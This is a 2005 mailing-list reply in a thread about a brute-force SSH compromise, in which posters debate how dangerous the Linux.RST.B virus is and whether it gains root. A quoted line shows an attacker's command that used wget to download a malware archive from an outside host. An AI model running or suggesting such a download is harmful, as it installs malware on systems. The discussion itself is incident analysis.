[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

Re: brute force ssh attack



On Wed, 2005-04-27 at 15:50 +0100, Nigel Wade wrote:
> Gustavo Seabra wrote:
> > On 4/27/05, Håkan Persson <hakan zyberit com> wrote:
> > 
> >>Daniel Kirsten wrote:
> >>
> >>
> >>>wget www.ring.as.ro/x/qwe.tgz
> >>>
> >>>
> >>
> >>This is what Symantec thinks of the content of the file:
> >>http://securityresponse.symantec.com/avcenter/venc/data/linux.rst.b.html
> >>
> >>/Håkan
> > 
> > 
> > Well, so much for the "do not wory about viruses in Linux machines" stories...
> > 
> 
> Number of infections 0-49, number of sites 0-2 - over 3 years.
> Wow, it's speading like wildfire... help, help!
> 
> It has no escalation mechanism, so can only infect ELF files to which the 
> user infected has write permission.
> 
> Threat ~0.
> 
> 

not true.
it also infects files in /bin as stated by symantic and as stated by
Daniel.  Thus it has some method of getting root privileges.




[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]